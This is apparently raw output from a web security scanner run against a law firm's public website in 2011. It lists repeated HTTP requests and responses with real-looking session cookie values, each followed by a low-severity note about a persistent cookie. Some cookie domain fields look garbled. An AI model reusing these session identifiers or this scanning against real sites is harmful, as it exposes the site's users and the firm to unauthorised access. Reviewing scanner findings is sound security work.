GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Munich HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2338%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /SanAntonio HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2763%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:56:53 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /StLouis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:57:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A57%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2807%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:57:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /houston HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2094%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
